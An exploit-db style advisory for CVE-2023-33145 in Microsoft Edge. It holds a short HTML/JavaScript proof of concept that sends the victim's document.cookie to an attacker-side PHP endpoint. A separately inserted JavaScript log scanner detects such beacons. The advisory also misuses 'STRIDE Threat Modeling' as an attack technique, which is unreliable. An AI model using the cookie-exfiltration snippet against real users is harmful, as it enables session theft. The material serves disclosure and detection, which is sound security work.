Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

06 Jul 2023 00:00:00 | Reported by nu11secur1ty | Type: exploitdb | Source: www.exploit-db.com

Microsoft Edge 114.0.1823.67 - Information Disclosure of IDs, tokens, nonces, cookies, IP, User-Agent, etc. The user must click on a specially crafted URL to be compromised. The attacker uses STRIDE Threat Modeling to spoof the victim.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2023-33145 | 14 Jun 2023 00:15 | attackerkb |
| Circl | CVE-2023-33145 | 14 Jun 2023 07:33 | circl |
| CNNVD | Microsoft Edge security vulnerability | 13 Jun 2023 00:00 | cnnvd |
| CVE | CVE-2023-33145 | 13 Jun 2023 23:26 | cve |
| Cvelist | CVE-2023-33145 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | 13 Jun 2023 23:26 | cvelist |
| EUVD | EUVD-2023-37330 | 3 Oct 2025 20:07 | euvd |
| Tenable Nessus | GLSA-202402-05 : Microsoft Edge: Multiple Vulnerabilities | 3 Feb 2024 00:00 | nessus |
| Tenable Nessus | Microsoft Edge (Chromium) < 114.0.1823.41 Multiple Vulnerabilities | 7 Jun 2023 00:00 | nessus |
| Gentoo Linux | Microsoft Edge: Multiple Vulnerabilities | 3 Feb 2024 00:00 | gentoo |
| Kaspersky | KLA50321 OSI vulnerability in Microsoft Browser | 13 Jun 2023 00:00 | kaspersky |

## Title: Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure, https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker uses STRIDE Threat Modeling to spoof the
victim into clicking on his website, and that is all it takes.
This will be hard to detect.

## Conclusion:
Please be careful with suspicious sites, and be careful about who is sending you
a link to open!

## Status: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```html
<!-- This is a GET request from the server when the victim clicks! And
it is enough to understand this vulnerability! =) -->

<script>
var i = new Image();
i.src = "PoCsess.php?cookie=" + escape(document.cookie);
</script>

<!-- WARNING: The PoCsess.php will not be uploaded for security reasons! -->
<!-- BR nu11secur1ty -->
```
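
A defensive counterpart to the beacon above, added here as an example and not part of the advisory or the author's code: a heuristic scan of web or proxy access logs for query parameters whose decoded value is shaped like a `document.cookie` string, including the `%uXXXX` sequences that `escape()` emits. The log format, the function names and the sample lines are assumptions constructed for illustration.

```javascript
// Added example (not from the advisory): heuristic detector for cookie-shaped
// values in request query strings, as produced by the beacon pattern above.

// Single-pass decoder for legacy escape() output: %XX and %uXXXX.
// decodeURIComponent() throws on %uXXXX, so it cannot be used here.
function decodeLegacyEscape(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Split "a=1; b=2" into cookie names; returns [] if the value is not cookie-shaped.
function parseCookieString(v) {
  const parts = v.split(/;\s*/).filter(Boolean);
  const pairs = parts.map(p => /^([^=;\s]+)=(.*)$/.exec(p));
  return pairs.every(Boolean) ? pairs.map(m => m[1]) : [];
}

// Findings for one access-log line (assumed format: ... "METHOD /path?query HTTP/x" ...).
function inspectLogLine(line) {
  const req = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
  if (!req || !req[1].includes("?")) return [];
  const query = req[1].slice(req[1].indexOf("?") + 1);
  const findings = [];
  for (const kv of query.split("&")) {
    const eq = kv.indexOf("=");
    if (eq < 1) continue;
    const param = kv.slice(0, eq);
    const names = parseCookieString(decodeLegacyEscape(kv.slice(eq + 1)));
    // Heuristic: several name=value pairs, or one pair under a telltale parameter name.
    if (names.length >= 2 || (names.length === 1 && /cookie|sess/i.test(param))) {
      findings.push({ param, cookieNames: names });
    }
  }
  return findings;
}

// Constructed sample log lines (addresses, paths and cookie values are made up).
const SAMPLE_LOG = [
  '203.0.113.7 - - [06/Jul/2023:10:00:01 +0000] "GET /PoCsess.php?cookie=sid%3Dabc123%3B%20csrf%3Dx9%3B%20name%3D%u0418%u0432 HTTP/1.1" 200 0',
  '203.0.113.7 - - [06/Jul/2023:10:00:02 +0000] "GET /search?q=edge%20update&page=2 HTTP/1.1" 200 512',
  '203.0.113.7 - - [06/Jul/2023:10:00:03 +0000] "GET /img/logo.png HTTP/1.1" 200 2048',
];

function scan(lines) {
  return lines.map((l, i) => ({ line: i + 1, findings: inspectLogLine(l) }))
              .filter(r => r.findings.length > 0);
}

console.log(JSON.stringify(scan(SAMPLE_LOG), null, 2));
```

The scan reports only cookie names, not values, so the findings can be stored or forwarded without copying session secrets into another system.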

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spent:
01:30:00

Vulners AI Score: 7.1 (High risk)
CVSS 3.1: 6.5
EPSS: 0.07436